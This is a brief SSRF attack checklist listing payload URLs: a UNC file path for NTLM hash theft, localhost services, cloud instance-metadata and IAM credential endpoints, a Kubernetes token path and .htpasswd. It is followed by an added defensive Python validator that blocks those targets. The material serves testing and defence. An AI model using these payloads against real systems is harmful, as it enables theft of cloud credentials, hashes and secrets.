SSRF

So many things!

If you've determined you can control server-side requests, there are many things to ALWAYS check.

If it's a Windows box, you may be able to steal NTLM hashes with file://///10.1.1.1/smb/file.txt. This does require FIVE FORWARD SLASHES sometimes!

Check for any other internal service which may be open on localhost only.

ftp://localhost
http://localhost:8000
http://localhost:8080

Try to find internal secrets or instance metadata!

http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data
/var/run/secrets/kubernetes.io/serviceaccount/token

Check for any restricted pages which may show additional information when the request comes from the server itself.

http://localhost/.htpasswd
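
The same checklist read from the defending side, as an added example that is not part of the original page: a validator for user-supplied fetch targets that rejects every target listed above (file:// and ftp:// schemes, localhost services, the 169.254.169.254 metadata address). The function names and the injectable resolver are assumptions made for this sketch.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # file:// and ftp:// never reach the fetcher


def resolve(host):
    """Default resolver: every address the host name maps to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_forbidden(addr):
    """True for loopback, link-local (169.254.0.0/16), private and similar ranges."""
    ip = ipaddress.ip_address(addr.split("%")[0])  # drop any IPv6 zone id
    if getattr(ip, "ipv4_mapped", None):           # ::ffff:127.0.0.1 form
        ip = ip.ipv4_mapped
    return (ip.is_loopback or ip.is_link_local or ip.is_private
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def check_url(url, resolver=resolve):
    """Return (allowed, reason) for a user-supplied fetch target."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if not parts.hostname:
        return False, "no host"
    try:
        addrs = resolver(parts.hostname)
    except (OSError, LookupError, ValueError):
        return False, "resolution failed"
    bad = sorted(a for a in addrs if is_forbidden(a))
    if bad:  # reject if ANY resolved address is internal
        return False, "internal address: " + bad[0]
    return (True, "ok") if addrs else (False, "resolution failed")


if __name__ == "__main__":
    # Constructed resolver table so the demo runs offline.
    table = {"localhost": {"127.0.0.1"}, "169.254.169.254": {"169.254.169.254"}}
    for u in ("file://///10.1.1.1/smb/file.txt", "ftp://localhost",
              "http://localhost:8080", "http://169.254.169.254/latest/user-data"):
        print(u, "->", check_url(u, table.__getitem__))
```

The fetcher has to connect to the address that was validated and re-run the check on every redirect, otherwise a second DNS answer or a 302 response can still point the request at an internal address.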
